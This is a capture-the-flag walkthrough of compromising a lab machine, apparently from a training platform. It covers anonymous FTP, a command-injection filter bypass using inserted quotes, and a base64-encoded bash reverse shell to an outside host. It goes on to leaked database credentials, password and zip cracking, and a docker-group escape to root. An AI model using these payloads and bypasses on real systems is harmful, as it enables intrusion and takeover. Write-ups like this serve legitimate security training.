Target IP: 10.10.167.84
There are three TCP ports open on the target machine: FTP, SSH, and HTTP. I will start enumeration with the FTP as it allows anonymous login.
Port 21: FTP
This FTP application allows anonymous login. There is a text file called note.txt which contains the content shown above. The file hints two usernames anurodh and apaar, and the web application is using filtering.
Port 80: HTTP
The webpage above is displayed for this application.
I performed a directory search using the command gobuster dir -u http://10.10.167.84/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt and obtained the result above. There is an interesting page called /secret/index.php.
Browsing to /secret/index.php displays the page above. It allows command execution. Is the target machine vulnerable to command execution?
Performing commands such as ls is prohibited, as the message above is shown and the command is not executed. But there are numerous ways to bypass this!
Command ls is not allowed, but using l's' is allowed as it bypasses the filter.
I used the payload c'a't index.php to read the source code of this page to identify the whitelist and blacklist filters in place, and received the output above when I viewed the source code. The blacklist filter in place gives a lot of information. This blacklist filter is very simple and can be bypassed many ways, such as using even number of ' between commands.
I used the payload /bin/bash -i >& /dev/tcp/10.14.55.153/8443 0>&1. I encoded this payload in base64 to receive L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE=. Then I prefixed it with echo and suffixed it with |base64 -d | bash. I started a listener on port 8443, sent the payload, and received a reverse shell connection from the target machine. Now I have a foothold on the machine. The full payload is shown below.
echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE='| base64 -d | b'a'sh
echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE='| base64 -d | b'a'sh
Looks like /home/apaar/.helpline.sh can be executed with sudo as apaar.
Now I have a shell as apaar. I entered /bin/sh and then python3 -c 'import pty; pty.spawn("/bin/bash");' to spawn an interactive Python shell. The $msg 2>/dev/null is responsible for command execution.
The /var/www/files/index.php files contains the credential root:!@m+her00+@db.
And now I have access to the MySQL application using the credentials above.
There is an interesting database called webportal with the table users. This table contains the entries shown above.
I copied the two password hashes in a text file called hash and ran john on it. I obtained the passwords above. However, spraying these credentials against the different users did not work.
This hacker.php gives us a hint about the image.
There is an interesting directory with images. I started a Python HTTP server on the target machine, and downloaded the two files on my local machine.
The image contains a zip file called backup.zip. But it is password protected. Using john, I obtained the hash of this file and cracked it. The password I received is pass1word.
I extracted the file source_code.php. This file contains the information above. The password of the user anurodh is encoded in base64.
After decoding it, I obtained the password !d0ntKn0wmYp@ssw0rd. I used this to login to SSH.
Running id shows the user is a group of docker. And I used the command docker run -v /:/mnt --rm -it alpine chroot /mnt sh to break out of the docker. Now I have a root shell. GG.
The local.txt flag once I escalated my privileges to apaar.
The proof.txt flag.